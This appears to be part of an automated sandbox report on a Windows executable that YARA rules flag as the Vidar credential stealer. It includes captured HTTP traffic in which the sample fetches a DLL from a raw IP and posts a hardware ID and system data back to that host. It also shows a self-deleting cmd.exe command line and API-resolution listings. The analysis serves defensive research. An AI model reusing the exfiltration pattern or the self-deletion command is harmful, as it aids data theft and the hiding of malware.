@.rsrcx0@@.reloc`@@B
Sep 25, 2021 10:15:04.686398029 CEST	3479	OUT	GET /vcruntime140.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Host: 159.69.203.58 Connection: Keep-Alive
Sep 25, 2021 10:15:04.708925009 CEST	3481	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 Sep 2021 08:15:04 GMT Content-Type: application/x-msdos-program Content-Length: 83784 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "14748-57aa1f0b0df80" Expires: Sun, 26 Sep 2021 08:15:04 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$NEEE"GL^NElUVA_D2DDRichEPEL8'Y"! @@A H?08@.text `.dataD@.idata@@.rsrc @@.reloc0@B
Sep 25, 2021 10:15:10.041330099 CEST	3577	OUT	POST / HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 97042 Host: 159.69.203.58 Connection: Keep-Alive Cache-Control: no-cache
Sep 25, 2021 10:15:10.041371107 CEST	3591	OUT	Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 64 30 36 65 64 36 33 35 2d 36 38 66 Data Ascii: --1BEF0A57BE110FD467AContent-Disposition: form-data; name="hwid"d06ed635-68f6-4e9a-955c-90ce-806e6f6e6963--1BEF0A57BE110FD467AContent-Disposition: form-data; name="os"Windows 10 Pro--1BEF0A57BE110FD467AContent-Disposition: fo
Sep 25, 2021 10:15:10.063308954 CEST	3598	OUT	Data Raw: 3d 38 b9 48 40 05 a5 00 f0 88 45 3a 8c 8b e7 b6 3a 1c b8 8f 3c 01 e8 0d e0 dc e8 ae 11 94 db 7d c8 ad 08 1c b5 c0 3f ef 70 01 0a d1 e2 23 48 9b 08 dc 5c 88 47 c6 25 1e 8d 4b 27 81 9f e4 e1 5b a0 a0 9e 39 5f 01 15 aa 8b 13 7f 16 d1 24 00 36 0b e1 Data Ascii: =8H@E::<}?p#H\G%K'[9_$6\|3Nl^&o<^=i?>'py]-EY'\|Vva5pK4'j"1evT\|UMdblEmfy8cg89%7wW
Sep 25, 2021 10:15:10.063365936 CEST	3608	OUT	Data Raw: b8 e9 84 78 ee 59 06 76 2f fd 94 e7 46 ca e8 c4 d8 d6 cd 5d 6b 89 70 f6 e1 d9 1b 3f e4 7c 74 3a a6 19 ab 42 f7 80 9d 88 2b ec 37 48 72 56 43 6b af 92 5d bc ba 31 03 df 13 7d 47 99 b8 b8 4a 34 12 6f d9 b7 3d db 9e 7b c3 e5 30 ca b6 31 d7 e4 67 79 Data Ascii: xYv/F]kp?\|t:B+7HrVCk]1}GJ4o={01gy}Ac!Q}uuw\|h$][k7DV<="$E3ocZ&~og4{4,mBELK)G9<cF),Np]Q!rE-sT` B%6IZ
Sep 25, 2021 10:15:10.063405991 CEST	3616	OUT	Data Raw: 3e be 10 0a 99 f0 a6 7e e0 03 5f 48 62 a7 b0 e9 eb 1a 3e 31 57 17 f9 2e f1 aa c2 22 9e 54 2a 96 c2 76 00 60 80 0f fa 42 2e eb 08 a3 5c 8b cc 42 32 96 fe cf de ba e2 f1 fa 87 8e f4 57 d4 d0 fc 11 6f 06 a9 34 0a 3b ea 6c fa 02 8b 02 91 88 1f 28 05 Data Ascii: >~_Hb>1W."Tv`B.\B2Wo4;l(Boa(m2?1.9/nNQRD\9@=?CHT)n\|XFqBAJP}D\;]?a&S+Aq[3<;8.7~7Y9
Sep 25, 2021 10:15:10.063489914 CEST	3622	OUT	Data Raw: 9a 33 42 e6 9a c5 d3 a6 83 98 66 1d cf e6 33 d3 dc 17 d1 ca b3 11 5a f3 7a eb fe 77 bb 48 27 68 b3 bf 50 bd 5b 88 84 77 7c 96 c4 b8 26 c7 a7 be b9 00 45 7d 65 7c 40 37 6d b3 b8 53 b8 3e 7c a6 93 b4 3b d5 ea 54 ec ab 07 93 73 5f d0 37 ff 1c a0 42 Data Ascii: 3Bf3ZzwH'hP[w\|&E}e\|@7mS>\|;Ts_7B"Xmk5.54A~n'\YKb+Y#=Ur5UlWp_RIo)?Qb$Fry0 z`J1sZ{fZ4%:Gk.
Sep 25, 2021 10:15:10.086191893 CEST	3627	OUT	Data Raw: ba 0a 33 b3 bf db fd e8 f7 9d ea 8d ec 9f 38 49 8e d8 12 55 ac 5b b4 e8 70 ca 54 df cd ba 3d a6 48 5b a8 f6 4f 6a c1 de 3e d6 4f 31 7b 31 66 95 f2 fa db d3 55 d5 6e f5 97 dc 35 8d 35 e6 2e 7e c0 bb 42 4c 82 fd e5 ce a2 6d 35 6d 27 ea 8f 3d 1f f6 Data Ascii: 38IU[pT=H[Oj>O1{1fUn55.~BLm5m'=Ry1i)xS!uzh}_4,zQ.N?92~x"5gr^f;)V.nz^3\|#W6AmN{.y^I
Sep 25, 2021 10:15:10.086220026 CEST	3635	OUT	Data Raw: 5e c8 90 91 cd c4 20 97 e3 63 ce 95 a7 84 fb e1 3b b9 6f e5 b4 5e 9e 9a 2c 13 8d 24 28 4a 07 65 33 29 49 00 dc a8 7b a7 fc 37 75 5a 70 e7 0b f2 ea 93 ad d7 2d c2 b0 c7 98 16 d4 86 fa db 3a 2f 37 12 75 fe b1 e9 02 84 98 97 1f 39 53 f7 3b 85 36 a2 Data Ascii: ^ c;o^,$(Je3)I{7uZp-:/7u9S;614<=M@]e behIY7;%a%#ct_@Mg@a;z~'Hc+9K ]/l7!m:B=&6}oGq@tS;= cdLy{hV]x1_-
Sep 25, 2021 10:15:10.086246967 CEST	3646	OUT	Data Raw: 30 98 5d 69 12 ee 7e e3 a9 fa 11 8a 29 7c e3 9c f2 1b 02 e0 3e d4 e9 98 c3 f2 65 50 93 00 90 7f 1d b3 56 10 e1 ef f8 7c 28 51 b0 ba 7a d3 03 9c d5 d6 3d 32 1f 82 bd 49 0a 12 0a e9 31 7e 5d 9b b5 30 7b 5d a9 65 3e 78 53 ac cf 83 a7 31 c7 62 20 d0 Data Ascii: 0]i~)\|>ePV\|(Qz=2I1~]0{]e>xS1b q0iiYJ<3vlj=q{-WU$fVuEQH74xC!39,nGuM2^~w.n72RyV8]i\|&BCk9M{5
Sep 25, 2021 10:15:10.086271048 CEST	3653	OUT	Data Raw: 84 c8 cb 64 20 df d9 22 62 f7 bd a4 28 88 bb 12 97 8b ce 56 66 8d 3d 0b fd d9 da 7b 8d be a4 48 a9 b0 a4 fb 60 bf 89 41 3d f0 9f cb d8 f1 8d c5 45 ff 5b e4 82 fb 19 2e d4 f0 87 ac 0c 6a 35 c5 b6 bd 2c cc b0 29 fa 5c fa d2 d4 ce 61 34 30 37 e5 24 Data Ascii: d "b(Vf={H`A=E[.j5,)\a407$<%1xy"UD6$'A{V$AUuA$CFPbd[z1c$XLiN$X}UoPg>)tWo1[&Q0r 9GUA*XCLxy^My2"G
Sep 25, 2021 10:15:10.086389065 CEST	3667	OUT	Data Raw: 0f 60 03 fd fb 0d 32 a6 14 0d 42 82 82 37 32 79 11 9b 59 f1 99 0b 5a 1f 79 56 84 9f d2 fd f9 b5 a9 92 fc e6 1d 76 39 28 8f ff 7c 6f 70 84 07 ce 4e c1 ad 06 74 b2 ac 3b 05 93 21 08 16 6e 35 5e c4 9d 4c 6e ed 6e 83 8f f7 6d d4 f6 6f da 48 8f dc 6d Data Ascii: `2B72yYZyVv9(\|opNt;!n5^LnnmoHmuzkVRuIDI'b")VXvQ_W Wl2y@qO-K7KV<4RNze`<8s$
Sep 25, 2021 10:15:10.368840933 CEST	3674	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 Sep 2021 08:15:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Content-Encoding: gzip Data Raw: 31 36 0d 0a 1f 8b 08 00 00 00 00 00 04 03 cb cf 06 00 47 dd dc 79 02 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 16Gy0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49743	88.99.75.82	443	C:\Users\user\Desktop\0lm81UZm7Y.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-25 08:15:02 UTC	0	OUT	GET /@killern0 HTTP/1.1 Host: mas.to
2021-09-25 08:15:03 UTC	0	IN	HTTP/1.1 200 OK Date: Sat, 25 Sep 2021 08:15:03 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Server: Mastodon X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Permissions-Policy: interest-cohort=() Link: <https://mas.to/.well-known/webfinger?resource=acct%3Akillern0%40mas.to>; rel="lrdd"; type="application/jrd+json", <https://mas.to/users/killern0>; rel="alternate"; type="application/activity+json" Vary: Accept, Accept-Encoding, Origin Cache-Control: max-age=0, public ETag: W/"a868a84320f39b6d65dd179cb53f085a" Content-Security-Policy: base-uri 'none'; default-src 'none'; frame-ancestors 'none'; font-src 'self' https://mas.to; img-src 'self' https: data: blob: https://mas.to; style-src 'self' https://mas.to 'nonce-p9wD9lKABoSqlaRyNR3Szw=='; media-src 'self' https: data: https://mas.to; frame-src 'self' https:; manifest-src 'self' https://mas.to; connect-src 'self' data: blob: https://mas.to https://media.mas.to wss://mas.to; script-src 'self' https://mas.to; child-src 'self' blob: https://mas.to; worker-src 'self' blob: https://mas.to Set-Cookie: _mastodon_session=YS5pHXcYD0j25x%2F1ndWtVDgJ4Zad6Bdzeo1TbJ3D4EeQeilH%2B%2BYAdufyJWMg7Bzd3oQs3rmZrHnw0ROfBK2iqHm%2BMv69La50tMhX4Uzw4JEgcyZdK2a3j5ef%2F4Jm4AXyz5845F1cRktvzDC9sDd%2F9vy6tya88lgTr4TmowOpegM8UZ4n2Rkf8NT4r2HZlJ3UuTEtvZDD6MVy%2BDNIqVnhC4oSWnLVf%2BlM9PIp7D9AJ%2B%2B2BldEIDa46ZYscMC13V6uvKhAHxaMFsto3kvCRFAex53yaSR6m%2FbrT2GB5ZRe4D%2FUcm0PDdONNX6X4478pyD%2B26On9a7WRHldQfQknU0rSILsJI4p58Kdosb1Dt5TFBfRl%2Fg2ig%3D%3D--Rujvu3cv2KP%2BDvKO--sAnp6ROhOpRGF6evW9%2BPNQ%3D%3D; path=/; secure; HttpOnly; SameSite=Lax X-Request-Id: 277df84b-98da-4fc2-8fa3-f56bdb63d094 X-Runtime: 0.075339 Strict-Transport-Security: max-age=63072000; includeSubDomains X-Cached: MISS Strict-Transport-Security: max-age=31536000
2021-09-25 08:15:03 UTC	1	IN	Data Raw: 35 30 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 27 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 75 74 66 2d 38 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 27 20 72 65 6c 3d 27 69 63 6f 6e 27 20 74 79 70 65 3d 27 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 27 20 72 65 6c 3d 27 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 27 20 73 Data Ascii: 5054<!DOCTYPE html><html lang='en'><head><meta charset='utf-8'><meta content='width=device-width, initial-scale=1' name='viewport'><link href='/favicon.ico' rel='icon' type='image/x-icon'><link href='/apple-touch-icon.png' rel='apple-touch-icon' s
2021-09-25 08:15:03 UTC	16	IN	Data Raw: 2e 37 39 38 38 32 39 2d 31 35 2e 37 33 38 32 38 2d 31 38 2e 37 39 38 38 32 39 2d 31 31 2e 36 30 32 35 20 30 2d 31 37 2e 34 31 37 39 37 20 37 2e 35 30 38 35 31 36 2d 31 37 2e 34 31 37 39 37 20 32 32 2e 33 35 33 35 31 36 76 33 32 2e 33 37 35 30 30 32 48 39 36 2e 32 30 37 30 33 31 56 38 35 2e 34 32 33 38 32 38 63 30 2d 31 34 2e 38 34 35 2d 35 2e 38 31 35 34 36 38 2d 32 32 2e 33 35 33 35 31 35 2d 31 37 2e 34 31 37 39 36 39 2d 32 32 2e 33 35 33 35 31 36 2d 31 30 2e 34 39 33 37 35 20 30 2d 31 35 2e 37 34 30 32 33 34 20 36 2e 33 33 30 30 37 39 2d 31 35 2e 37 34 30 32 33 34 20 31 38 2e 37 39 38 38 32 39 76 35 39 2e 31 34 38 34 33 39 48 33 38 2e 39 30 34 32 39 37 56 38 30 2e 30 37 36 31 37 32 63 30 2d 31 32 2e 34 35 35 20 33 2e 31 37 31 30 31 36 2d 32 32 2e 33 35 Data Ascii: .798829-15.73828-18.798829-11.6025 0-17.41797 7.508516-17.41797 22.353516v32.375002H96.207031V85.423828c0-14.845-5.815468-22.353515-17.417969-22.353516-10.49375 0-15.740234 6.330079-15.740234 18.798829v59.148439H38.904297V80.076172c0-12.455 3.171016-22.35

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 0lm81UZm7Y.exe PID: 6636 Parent PID: 1460

General

Start time:	10:14:54
Start date:	25/09/2021
Path:	C:\Users\user\Desktop\0lm81UZm7Y.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\0lm81UZm7Y.exe'
Imagebase:	0x400000
File size:	589312 bytes
MD5 hash:	14C81D7BC27BDB0D92CFFF414F8FFD04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.278147128.00000000006C4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.278284873.00000000021A0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000003.247214194.00000000022C0000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 5616 Parent PID: 6636

General

Start time:	10:15:12
Start date:	25/09/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\cmd.exe' /c taskkill /im 0lm81UZm7Y.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\0lm81UZm7Y.exe' & del C:\ProgramData\*.dll & exit
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 4636 Parent PID: 5616

General

Start time:	10:15:12
Start date:	25/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: taskkill.exe PID: 6152 Parent PID: 5616

General

Start time:	10:15:13
Start date:	25/09/2021
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /im 0lm81UZm7Y.exe /f
Imagebase:	0x7ff797770000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: timeout.exe PID: 5420 Parent PID: 5616

General

Start time:	10:15:13
Start date:	25/09/2021
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 6
Imagebase:	0x1290000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 0lm81UZm7Y.exe PID: 6636 Parent PID: 1460 0lm81UZm7Y.exeCOMMON

Executed Functions

Function 00496880, Relevance: 145.5, APIs: 55, Strings: 28, Instructions: 279libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(006CCFA0,00000000), ref: 0049688B
GetProcAddress.KERNEL32(00000000,006CD120), ref: 004968A5
GetProcAddress.KERNEL32(00000000,006CCFB8), ref: 004968B4
LoadLibraryA.KERNEL32(006CCF40), ref: 004968C3
LoadLibraryA.KERNEL32(006CD000), ref: 004968D2
LoadLibraryA.KERNEL32(006CD090), ref: 004968E3
LoadLibraryA.KERNEL32(006CD2D0), ref: 004968F1
LoadLibraryA.KERNEL32(gdi32.dll), ref: 004968FE
LoadLibraryA.KERNEL32(ole32.dll), ref: 0049690B
LoadLibraryA.KERNEL32(user32.dll), ref: 0049691A
GetProcAddress.KERNEL32(00000000,006C8240), ref: 00496930
GetProcAddress.KERNEL32(00000000,00645AC8), ref: 00496943
GetProcAddress.KERNEL32(00000000,006C81C8), ref: 00496955
GetProcAddress.KERNEL32(00000000,00645AA8), ref: 00496968
GetProcAddress.KERNEL32(00000000,006C8268), ref: 0049697B
GetProcAddress.KERNEL32(00000000,006CD138), ref: 0049698D
GetProcAddress.KERNEL32(?,00645B88), ref: 004969A8
GetProcAddress.KERNEL32(?,00645AE8), ref: 004969BB
GetProcAddress.KERNEL32(00000000,006CCF58), ref: 004969D5
GetProcAddress.KERNEL32(00000000,00645C28), ref: 004969E8
GetProcAddress.KERNEL32(00000000,006CD180), ref: 004969FB
GetProcAddress.KERNEL32(00000000,006CD198), ref: 00496A0D
GetProcAddress.KERNEL32(00000000,006CCF70), ref: 00496A20
GetProcAddress.KERNEL32(00000000,006CD1B0), ref: 00496A33
GetProcAddress.KERNEL32(00000000,006CD1C8), ref: 00496A45
GetProcAddress.KERNEL32(00000000,006CCEE0), ref: 00496A58
GetProcAddress.KERNEL32(00000000,00645BE8), ref: 00496A6B
GetProcAddress.KERNEL32(00000000,00645C48), ref: 00496A85
GetProcAddress.KERNEL32(00000000,006458A8), ref: 00496A98
GetProcAddress.KERNEL32(00000000,00645928), ref: 00496AAB
GetProcAddress.KERNEL32(00000000,00645A08), ref: 00496ABD
GetProcAddress.KERNEL32(00000000,00645948), ref: 00496AD0
GetProcAddress.KERNEL32(00000000,006CD228), ref: 00496AE3
GetProcAddress.KERNEL32(00000000,00645968), ref: 00496AF5
GetProcAddress.KERNEL32(00000000,006CD210), ref: 00496B08
GetProcAddress.KERNEL32(00000000,006CE288), ref: 00496B1B
GetProcAddress.KERNEL32(00000000,006CE168), ref: 00496B2D
GetProcAddress.KERNEL32(00000000,006CE0A8), ref: 00496B40
GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 00496B55
GetProcAddress.KERNEL32(00000000,SelectObject), ref: 00496B66
GetProcAddress.KERNEL32(00000000,BitBlt), ref: 00496B77
GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 00496B88
GetProcAddress.KERNEL32(00000000,CreateDCA), ref: 00496B99
GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 00496BAA
GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 00496BBB
GetProcAddress.KERNEL32(?,CoCreateInstance), ref: 00496BD6
GetProcAddress.KERNEL32(?,CoUninitialize), ref: 00496BE7
GetProcAddress.KERNEL32(?,GetDesktopWindow), ref: 00496C04
GetProcAddress.KERNEL32(?,ReleaseDC), ref: 00496C19
GetProcAddress.KERNEL32(?,GetKeyboardLayoutList), ref: 00496C2A
GetProcAddress.KERNEL32(?,CharToOemA), ref: 00496C3B
GetProcAddress.KERNEL32(?,GetDC), ref: 00496C4C
GetProcAddress.KERNEL32(?,wsprintfA), ref: 00496C5D
GetProcAddress.KERNEL32(?,EnumDisplayDevicesA), ref: 00496C6E
GetProcAddress.KERNEL32(?,GetSystemMetrics), ref: 00496C7F

Strings

EnumDisplayDevicesA, xrefs: 00496C63
(Yd, xrefs: 00496A9E
GetDC, xrefs: 00496C41
CharToOemA, xrefs: 00496C30
CoCreateInstance, xrefs: 00496BD0
HYd, xrefs: 00496AC3
CreateDCA, xrefs: 00496B8E
hYd, xrefs: 00496AEE
CoUninitialize, xrefs: 00496BDC
user32.dll, xrefs: 00496911
H\d, xrefs: 00496A7E
ReleaseDC, xrefs: 00496C0E
DeleteObject, xrefs: 00496B7D
[d, xrefs: 00496A5E
GetDesktopWindow, xrefs: 00496BFE
GetDeviceCaps, xrefs: 00496B9F
(\d, xrefs: 004969DB
wsprintfA, xrefs: 00496C52
Zd, xrefs: 004969AE
GetSystemMetrics, xrefs: 00496C74
hl, xrefs: 00496B26
GetKeyboardLayoutList, xrefs: 00496C1F
SelectObject, xrefs: 00496B5B
gdi32.dll, xrefs: 004968F7
BitBlt, xrefs: 00496B6C
ole32.dll, xrefs: 00496904
CreateCompatibleBitmap, xrefs: 00496B4F
CreateCompatibleDC, xrefs: 00496BB0

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: (Yd$(\d$BitBlt$CharToOemA$CoCreateInstance$CoUninitialize$CreateCompatibleBitmap$CreateCompatibleDC$CreateDCA$DeleteObject$EnumDisplayDevicesA$GetDC$GetDesktopWindow$GetDeviceCaps$GetKeyboardLayoutList$GetSystemMetrics$HYd$H\d$ReleaseDC$SelectObject$gdi32.dll$hYd$hl$ole32.dll$user32.dll$wsprintfA$Zd$[d
API String ID: 2238633743-129567883
Opcode ID: 752388e8879909a42816c28012a607ceec3cdc4bb3599b94f0a9196bae0505bf
Instruction ID: 3b4c775fae62163c77419a6e99b8901aad04518a99974895bb2c5bf3183d9138
Opcode Fuzzy Hash: 752388e8879909a42816c28012a607ceec3cdc4bb3599b94f0a9196bae0505bf
Instruction Fuzzy Hash: 21B170B5A12200AFD7409FA5ED499667BFCEBCE712311453BF505E3260EBB499008F6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405D80, Relevance: 69.2, APIs: 30, Strings: 9, Instructions: 921stringfileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00405DF3
_memset.LIBCMT ref: 00405E06
_memset.LIBCMT ref: 00405E19
_memset.LIBCMT ref: 00405E2C
lstrcpyW.KERNEL32 ref: 00405E43
lstrcatW.KERNEL32(?,\*.*), ref: 00405E58
FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,?,77EF155D), ref: 00405E6A
lstrcpyW.KERNEL32 ref: 00405E8D
lstrcatW.KERNEL32(?,004BB804), ref: 00405E9C
lstrcatW.KERNEL32(?,?), ref: 00405EAE
lstrcpyW.KERNEL32 ref: 00405EBD
lstrcatW.KERNEL32(?,004BB804), ref: 00405ECC
lstrcatW.KERNEL32(?,?), ref: 00405EDE
lstrcmpW.KERNEL32(?,004BB800), ref: 00405EFB
lstrcmpW.KERNEL32(?,004BB7F8), ref: 00405F16
PathMatchSpecW.SHLWAPI(?,00000000,?,?), ref: 00406057
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,77EF155D), ref: 00406205
FindNextFileW.KERNELBASE(?,00000010,006CCD00,00000000,006CCD01,00647460,00000000,00647461,006CCA10,00000000,006CCA11,00647448,00000000,00647449,006CC8D0,00000000), ref: 004067D0
_memset.LIBCMT ref: 00406805
_memset.LIBCMT ref: 00406818
_memset.LIBCMT ref: 0040682B
_memset.LIBCMT ref: 0040683E
FindClose.KERNEL32(00000000), ref: 00406847
FindClose.KERNEL32(?), ref: 00406884
_memset.LIBCMT ref: 00406898
_memset.LIBCMT ref: 004068AB
_memset.LIBCMT ref: 004068BE
_memset.LIBCMT ref: 004068D1

Strings

Td, xrefs: 004063FB
sd, xrefs: 004062E1
